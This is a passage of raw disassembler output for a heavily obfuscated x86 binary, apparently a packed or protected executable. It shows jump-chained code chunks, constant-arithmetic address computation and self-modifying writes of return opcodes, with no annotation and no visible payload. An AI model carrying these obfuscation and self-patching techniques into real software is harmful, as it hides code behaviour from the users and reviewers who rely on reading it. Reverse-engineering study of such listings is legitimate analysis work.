loc_4401F0:				; CODE XREF: sub_43D16B:loc_4583D2j
		popf
		xchg	eax, [esp+1Ch+var_1C]
		jmp	sub_456DE7
; END OF FUNCTION CHUNK	FOR sub_43D16B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_4401F9:				; CODE XREF: sub_453405-8DEBj
		pop	ecx
		push	0C54F0EC3h
		pop	eax
		sub	eax, 58095CA0h
		rol	eax, 0Dh
		sub	eax, 0FA96E943h
		add	eax, 4496182Fh
		mov	eax, [eax]
		jmp	loc_455EF9
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B9BB

loc_44021C:				; CODE XREF: sub_45B9BB+Dj
		push	0D5CF19FFh
		pop	eax
		add	eax, 547DAD5Eh
		cmp	eax, 86039978h
		jmp	loc_444089
; END OF FUNCTION CHUNK	FOR sub_45B9BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_440233:				; CODE XREF: sub_43F227:loc_44AA6Bj
		jz	loc_43BCB4
		jmp	loc_45266F
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_44023E:				; CODE XREF: hvvrg7ie:0043E1D0j
		pop	edx
		xor	eax, eax
		call	sub_442D68

loc_440246:				; CODE XREF: hvvrg7ie:00451D31j
		jmp	loc_44C36B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_44024B:				; CODE XREF: sub_4403D4+9849j
		jmp	loc_4398CC
; END OF FUNCTION CHUNK	FOR sub_4403D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453422

loc_440250:				; CODE XREF: sub_453422-B5BAj
		jmp	loc_443725
; END OF FUNCTION CHUNK	FOR sub_453422
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A230

loc_440255:				; CODE XREF: sub_44A230:loc_451534j
		mov	eax, 0B4B93D2h
		push	edi
		push	70F1D393h
		pop	edi
		jmp	loc_450470
; END OF FUNCTION CHUNK	FOR sub_44A230
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_440266:				; CODE XREF: sub_4465A6:loc_4406A9j
		call	sub_4553DE

loc_44026B:				; CODE XREF: sub_43C362+Ej
		jmp	loc_44C2BB
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------

loc_440270:				; CODE XREF: hvvrg7ie:00439336j
		jmp	loc_449EC7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_440275:				; CODE XREF: sub_454099-1392Fj
		jle	nullsub_272

loc_44027B:				; CODE XREF: sub_454099:loc_449FC3j
		push	0
		push	0

loc_44027F:				; CODE XREF: sub_45438B:loc_45AABCj
		push	10h
		push	0B727FE19h
		pop	eax
		add	eax, 0F29CE1FCh
		xor	eax, 0A1DEF60h
		jmp	loc_4471BF
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA38

loc_440298:				; CODE XREF: sub_45AA38-1BF7Cj
		jl	loc_444E18
		rol	eax, 1Ch
		sbb	eax, 557C894Ch
		jmp	loc_444E0B
; END OF FUNCTION CHUNK	FOR sub_45AA38
; ---------------------------------------------------------------------------

loc_4402AC:				; CODE XREF: hvvrg7ie:00443079j
		jnz	loc_43A396
		jmp	loc_44B066
; ---------------------------------------------------------------------------
		cmp	edx, ebx
		jmp	loc_45B7B7
; ---------------------------------------------------------------------------

loc_4402BE:				; DATA XREF: sub_44FC12:loc_4478C6o
		shl	eax, cl
		mov	edx, [ebp-14h]
		shr	edx, 3
		push	0B4824B35h
		pop	ecx
		and	ecx, 5C366FBCh
		jmp	loc_455397
; ---------------------------------------------------------------------------

loc_4402D7:				; DATA XREF: sub_43D980-217Ao
		add	edx, 90FBC6C6h
		sub	eax, edx
		pop	edx
		ror	eax, 17h
		push	offset sub_44934B
		jmp	locret_439BCC
; ---------------------------------------------------------------------------

loc_4402ED:				; CODE XREF: hvvrg7ie:0044FDF4j
		jle	loc_448E68
		xchg	edi, [edx]

; =============== S U B	R O U T	I N E =======================================



sub_4402F5	proc near		; CODE XREF: sub_44957E:loc_44D866p

arg_0		= dword	ptr  4

		xchg	esi, [esp+0]
		pop	esi
		add	ecx, 31EF7409h

loc_4402FF:				; DATA XREF: sub_445D53+C96Co
		xchg	ecx, [esp-4+arg_0]
		jmp	nullsub_16
sub_4402F5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	ebx
		push	385B89CFh
		jmp	loc_450914

; =============== S U B	R O U T	I N E =======================================



sub_440312	proc near		; CODE XREF: hvvrg7ie:0044E4B9j
					; hvvrg7ie:0044E880p
		xchg	edi, [esp+0]
		pop	edi
		call	sub_44059F
		push	ecx
		push	24B40357h
		pop	ecx
		sub	ecx, ds:4000F8h
sub_440312	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43D531

loc_440328:				; CODE XREF: sub_43D531:loc_442AB8j
		or	ecx, 0B12EA620h
		jmp	loc_447C45
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439FEE

loc_440333:				; CODE XREF: sub_439FEE+18A65j
		jnz	loc_447A87
; END OF FUNCTION CHUNK	FOR sub_439FEE
; START	OF FUNCTION CHUNK FOR sub_43C4D7

loc_440339:				; CODE XREF: sub_43C4D7+10j
		jmp	loc_4555BB
; END OF FUNCTION CHUNK	FOR sub_43C4D7
; ---------------------------------------------------------------------------
		pushf
		and	ebp, ecx
		add	edx, ebp
		jmp	loc_447A87
; ---------------------------------------------------------------------------

loc_440348:				; CODE XREF: hvvrg7ie:0044D394j
		cmp	ecx, eax
; START	OF FUNCTION CHUNK FOR sub_4589D3

loc_44034A:				; CODE XREF: sub_4589D3:loc_43D6A3j
		jmp	loc_4473F3
; END OF FUNCTION CHUNK	FOR sub_4589D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452637

loc_44034F:				; CODE XREF: sub_452637-1365Aj
		jz	loc_44AD04
; END OF FUNCTION CHUNK	FOR sub_452637
; START	OF FUNCTION CHUNK FOR sub_448663

loc_440355:				; CODE XREF: sub_448663+6788j
		jmp	loc_4426B4
; END OF FUNCTION CHUNK	FOR sub_448663
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_44035A:				; CODE XREF: sub_43EB47+8j
		jmp	loc_43DBB3
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------
		jge	loc_44AC01
		jmp	loc_44ACFC
; ---------------------------------------------------------------------------

loc_44036A:				; CODE XREF: hvvrg7ie:00457B2Cj
		popf

; =============== S U B	R O U T	I N E =======================================



sub_44036B	proc near		; CODE XREF: sub_43B9C9:loc_44CB70p

; FUNCTION CHUNK AT 0044A210 SIZE 00000020 BYTES

		xchg	esi, [esp+0]
		pop	esi
		and	al, 0F6h
		jmp	loc_44A210
sub_44036B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5FD

loc_440376:				; CODE XREF: hvvrg7ie:00447769j
					; sub_43D5FD+18BB9j
		add	eax, 0D579B4F8h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_4487E6
		jmp	loc_453BF4
; END OF FUNCTION CHUNK	FOR sub_43D5FD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_300. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445E8E

loc_44038C:				; CODE XREF: sub_445E8E+11j
		xor	eax, 671D7ACBh
		sub	eax, 0FCA3AB6Fh
		or	eax, 2C93EB2Fh
		add	eax, 5047E14Dh
		jmp	loc_447D85
; END OF FUNCTION CHUNK	FOR sub_445E8E
; ---------------------------------------------------------------------------
		jnp	loc_43E086
		jmp	sub_444B4D
; ---------------------------------------------------------------------------

loc_4403B4:				; CODE XREF: hvvrg7ie:00448B3Fj
		adc	edi, edx

; =============== S U B	R O U T	I N E =======================================



sub_4403B6	proc near		; CODE XREF: sub_44E3B3-8635p

; FUNCTION CHUNK AT 0043A8B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B556 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043B876 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D258 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0043DF35 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043E236 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043E9A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443A33 SIZE 00000035 BYTES
; FUNCTION CHUNK AT 00447F2F SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004489C7 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004489E9 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00448E88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A61F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044BCDC SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044CD72 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451AF8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454DF6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456125 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458A9F SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045960A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459B12 SIZE 0000001B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		add	eax, ebp
		call	sub_44CA9C

loc_4403C1:				; CODE XREF: sub_448663+4DB5j
		jmp	loc_43D258
sub_4403B6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4569C6

loc_4403C6:				; CODE XREF: sub_4569C6:loc_452C11j
		mov	ebp, ecx
		pop	ecx
		retn
; END OF FUNCTION CHUNK	FOR sub_4569C6
; ---------------------------------------------------------------------------

loc_4403CA:				; CODE XREF: hvvrg7ie:00452507j
		jmp	loc_43EF13
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A0EC

loc_4403CF:				; CODE XREF: sub_43A0EC+Dj
		jmp	loc_4482E5
; END OF FUNCTION CHUNK	FOR sub_43A0EC

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4403D4	proc near		; CODE XREF: sub_439990+Fp
					; hvvrg7ie:loc_43CC55p	...

var_64		= byte ptr -64h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439238 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004398CC SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043ED7E SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043FEBB SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044024B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004412BD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441570 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044256B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00442DBA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004486C5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004493B9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449C10 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044DE86 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045403B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045431E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456F26 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00457EE6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00459176 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00459698 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_459698
sub_4403D4	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_156. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4403DD:				; CODE XREF: hvvrg7ie:00452E95j
		jmp	loc_43C337
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_4403E2:				; CODE XREF: sub_44616F-520j
		jmp	loc_45844B
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4410E1

loc_4403E7:				; CODE XREF: sub_4410E1+14DB6j
		push	eax
		call	sub_441167
		push	0
		lea	eax, [ebp-400h]
		push	edi
; END OF FUNCTION CHUNK	FOR sub_4410E1
; START	OF FUNCTION CHUNK FOR sub_450434

loc_4403F6:				; CODE XREF: sub_450434-110CBj
		mov	edi, eax

loc_4403F8:				; CODE XREF: sub_45038B:loc_43FE10j
		push	offset loc_446E66
		jmp	nullsub_121
; END OF FUNCTION CHUNK	FOR sub_450434

; =============== S U B	R O U T	I N E =======================================



sub_440402	proc near		; DATA XREF: sub_44A87E-FAFBo

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004422C5 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00449930 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044A5AA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B381 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BA1B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044D499 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F8D2 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044FBA6 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00459B71 SIZE 0000001B BYTES

		add	eax, 18h
		mov	[ebp-10h], eax
		mov	eax, [ebp-10h]
		mov	eax, [eax+60h]
		jmp	loc_44A5AA
sub_440402	endp


; =============== S U B	R O U T	I N E =======================================



sub_440413	proc near		; CODE XREF: sub_44B2D5:loc_439172p
					; hvvrg7ie:00443C64j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00458DCC SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	esi, 65C5B150h
		xchg	esi, [esp-4+arg_0]
		jmp	loc_458DCC
sub_440413	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446925

loc_440425:				; CODE XREF: sub_446925:loc_43C658j
		mov	esi, ecx
		xchg	esi, [esp+4+var_4]
		push	offset sub_4471F4
		jmp	loc_43EF03
; END OF FUNCTION CHUNK	FOR sub_446925
; ---------------------------------------------------------------------------

loc_440434:				; DATA XREF: sub_43BA2E+9o
		lea	eax, nullsub_484
		mov	byte ptr [eax],	0C3h
		jmp	loc_447D99
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	edx
		call	sub_4585EE
		mov	eax, 0FFB060E7h
		jmp	loc_45759D
; ---------------------------------------------------------------------------

loc_440456:				; CODE XREF: hvvrg7ie:00439712j
		jge	loc_43C0A1

loc_44045C:				; CODE XREF: hvvrg7ie:00459363j
		jmp	locret_44C05B
; ---------------------------------------------------------------------------

loc_440461:				; CODE XREF: hvvrg7ie:00453C24j
		jmp	sub_446A16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44980B

loc_440466:				; CODE XREF: sub_44980B:loc_44E6F6j
		jg	loc_44D724
		jmp	loc_44FB6D
; END OF FUNCTION CHUNK	FOR sub_44980B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_440471:				; CODE XREF: sub_440643+19F52j
		push	ecx
		push	0B558BE3Fh
		or	ecx, edi
		jmp	loc_4487E1
; END OF FUNCTION CHUNK	FOR sub_440643
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_118. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44121E

loc_44047F:				; CODE XREF: sub_44121E+18B1Cj
		jmp	loc_43A32C
; END OF FUNCTION CHUNK	FOR sub_44121E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451442

loc_440484:				; CODE XREF: sub_451442+Cj
		jmp	loc_44986B
; END OF FUNCTION CHUNK	FOR sub_451442
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FA83

loc_440489:				; CODE XREF: sub_43FA83+682j
		jmp	loc_43E9E0
; END OF FUNCTION CHUNK	FOR sub_43FA83

; =============== S U B	R O U T	I N E =======================================



sub_44048E	proc near		; DATA XREF: sub_449D53:loc_44AEBAo

; FUNCTION CHUNK AT 0043A364 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043AF4C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043C01F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043FE96 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B8CE SIZE 0000002A BYTES
; FUNCTION CHUNK AT 0044D562 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00451899 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00451DD0 SIZE 00000018 BYTES

		jnb	loc_43C01F
		call	sub_44F879

loc_440499:				; CODE XREF: sub_4551B7-192E1j
		jmp	loc_451DD0
sub_44048E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	5B4C99Bh
		pop	eax
		and	eax, 84F71582h
		add	eax, 138E5C54h
		call	sub_452637
; START	OF FUNCTION CHUNK FOR sub_440AC5

loc_4404B5:				; CODE XREF: sub_440AC5+17DA4j
		jmp	nullsub_326
; END OF FUNCTION CHUNK	FOR sub_440AC5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43931C

loc_4404BA:				; CODE XREF: sub_43931C+6j
		jmp	loc_43E7DB
; END OF FUNCTION CHUNK	FOR sub_43931C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_4404BF:				; CODE XREF: sub_456CD4:loc_439A3Bj
		jnz	loc_43C219
		jmp	loc_43DBA0
; END OF FUNCTION CHUNK	FOR sub_456CD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4405AA

loc_4404CA:				; CODE XREF: sub_4405AA:loc_44C0CFj
		pop	eax
		add	eax, 0D302C6BAh
		xor	eax, 3DAE56Ah
		push	eax
		pushf
		push	0B1443E2Ah
		pop	eax
		rol	eax, 17h
		jmp	loc_44F358
; END OF FUNCTION CHUNK	FOR sub_4405AA

; =============== S U B	R O U T	I N E =======================================



sub_4404E7	proc near		; DATA XREF: sub_43D30A+Co

; FUNCTION CHUNK AT 0044B7B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454F69 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00458150 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00459581 SIZE 0000000B BYTES

		or	eax, eax
		jnz	loc_4544FC
		jmp	loc_459581
sub_4404E7	endp

; ---------------------------------------------------------------------------
		or	ebx, ecx
		or	edi, 714D949Fh
		jmp	sub_43E26C
; ---------------------------------------------------------------------------

loc_440501:				; CODE XREF: hvvrg7ie:loc_440BFBj
		mov	byte ptr [eax],	0C3h
		jmp	loc_456E4F
; ---------------------------------------------------------------------------
		call	nullsub_484
		jmp	ds:dword_41D1B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_440514:				; CODE XREF: sub_451E6D-1019Cj
		jmp	loc_43F28E
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_440519:				; CODE XREF: sub_445CCD-A8ADj
		jmp	loc_439B08
; END OF FUNCTION CHUNK	FOR sub_445CCD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_484. PRESS KEYPAD	"+" TO EXPAND]
		db 83h
		dd 0FFFFFF1Eh, 0C445E95Ah
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_44052A:				; CODE XREF: sub_4465A6:loc_4410C0j
		jz	loc_459336
		jmp	loc_444923
; END OF FUNCTION CHUNK	FOR sub_4465A6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_392. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_440536:				; CODE XREF: sub_44398A+8823j
		xchg	esi, [esp+0]
		mov	ebp, esp
		push	ecx
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	al, [eax]
		js	loc_45671E
		jmp	loc_44C246
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F66B

loc_44054F:				; CODE XREF: sub_44F66B+20j
		pop	ecx
		mov	eax, [eax]
		push	eax
		push	ebx
		push	7CCE5FE1h
		pop	ebx
		xor	ebx, 0B5A08A17h
		jmp	loc_44ABFB
; END OF FUNCTION CHUNK	FOR sub_44F66B
; ---------------------------------------------------------------------------
		push	0CEB70488h
		pop	eax
		or	eax, 747F021Ah
		xor	eax, 9B304CADh
		rol	eax, 1Ch
		jmp	loc_44C62E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_337. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DE0A

loc_440580:				; CODE XREF: sub_44DE0A+BBC4j
		jmp	nullsub_375
; END OF FUNCTION CHUNK	FOR sub_44DE0A
; ---------------------------------------------------------------------------
		db 38h,	0C3h, 0D7h
dword_440588	dd 0			; DATA XREF: sub_458A13:loc_44C0EEr
					; hvvrg7ie:0044D617w
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E8C

loc_44058C:				; CODE XREF: sub_446E8C+10E42j
		jmp	loc_448EA3
; END OF FUNCTION CHUNK	FOR sub_446E8C
; ---------------------------------------------------------------------------
		db 16h,	0C6h, 0B3h
		dd 52A23555h, 2371C899h	; DATA XREF: sub_453BA4+6o
					; sub_4550CA+4o
		db 36h,	0C6h, 0

; =============== S U B	R O U T	I N E =======================================



sub_44059F	proc near		; CODE XREF: sub_43B6A5-174Ep
					; sub_43B36F-11F1j ...

var_8		= dword	ptr -8
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00439CC9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AF8B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B18F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C386 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043C65E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DF6B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EB54 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00440B6E SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00441499 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004418EB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004419E6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441F80 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00442A2F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442DA8 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00444C5D SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00445607 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004465D0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004471A0 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044729E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004484DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ACEC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BB1F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CA9B SIZE 00000001 BYTES
; FUNCTION CHUNK AT 00451FB8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045250C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004525D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452719 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004527CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045305C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004530C2 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004532C2 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00454AB4 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00458325 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00459BC7 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00459C00 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045A17C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045AE7C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045B01B SIZE 0000000E BYTES

		jnz	loc_459C00

loc_4405A5:				; CODE XREF: sub_44D4EF+BF8Aj
		jmp	loc_43B18F
sub_44059F	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4405AA	proc near		; CODE XREF: sub_440B96:loc_43C271p
					; hvvrg7ie:004558C6j

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 004404CA SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004436A4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00444737 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044C0CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E2F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F358 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00451320 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458A09 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		pop	edx

loc_4405AF:				; CODE XREF: hvvrg7ie:loc_440E54j
		js	loc_4436A4
		jmp	loc_444737
sub_4405AA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A4C9

loc_4405BA:				; CODE XREF: sub_45A4C9+Fj
		add	edx, 10DDD21Fh
		and	edx, 3A9A75Ah
		or	edx, 6708CFA3h
		add	edx, 993BD9AFh
		jmp	loc_4525DA
; END OF FUNCTION CHUNK	FOR sub_45A4C9

; =============== S U B	R O U T	I N E =======================================



sub_4405D7	proc near		; CODE XREF: hvvrg7ie:004545CAj
					; hvvrg7ie:00455B46p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00439C09 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004431B6 SIZE 00000036 BYTES
; FUNCTION CHUNK AT 00445703 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B108 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044D2E6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451A80 SIZE 00000011 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_43C082
		jmp	loc_445703
sub_4405D7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_4405EC:				; CODE XREF: sub_43FC15+2DFDj
		add	eax, ebp
		add	eax, 0D1A302Ch
		mov	eax, [eax]
		call	sub_44B3D0
; END OF FUNCTION CHUNK	FOR sub_43FC15
; START	OF FUNCTION CHUNK FOR sub_455CD4

loc_4405FB:				; CODE XREF: sub_455CD4+1Aj
		jmp	loc_446682
; END OF FUNCTION CHUNK	FOR sub_455CD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45480F

loc_440600:				; CODE XREF: sub_45480F+Bj
		xor	eax, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_45480F

; =============== S U B	R O U T	I N E =======================================



sub_440603	proc near		; CODE XREF: sub_44352A+B5E7p
					; sub_43C290:loc_454CE5j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043A797 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044670E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FEA8 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0044FF95 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451350 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00454A39 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004598AE SIZE 00000014 BYTES

		push	edi
		mov	edi, edx
		xchg	edi, [esp+4+var_4]
		push	0FBA0AE10h
		jmp	loc_454A39
sub_440603	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_440613:				; CODE XREF: hvvrg7ie:loc_446723j
		jl	loc_44268E
; START	OF FUNCTION CHUNK FOR sub_44955C

loc_440619:				; CODE XREF: sub_44955C+36A1j
		jmp	loc_459A23
; END OF FUNCTION CHUNK	FOR sub_44955C
; ---------------------------------------------------------------------------
		ror	ebp, 3
		jmp	loc_442C26
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439B29

loc_440626:				; CODE XREF: sub_439B29:loc_440CEAj
		jz	loc_44ADD5
		jmp	loc_4451F2
; END OF FUNCTION CHUNK	FOR sub_439B29

; =============== S U B	R O U T	I N E =======================================



sub_440631	proc near		; CODE XREF: hvvrg7ie:00439ACEj
					; sub_44E72F-6E7Cp

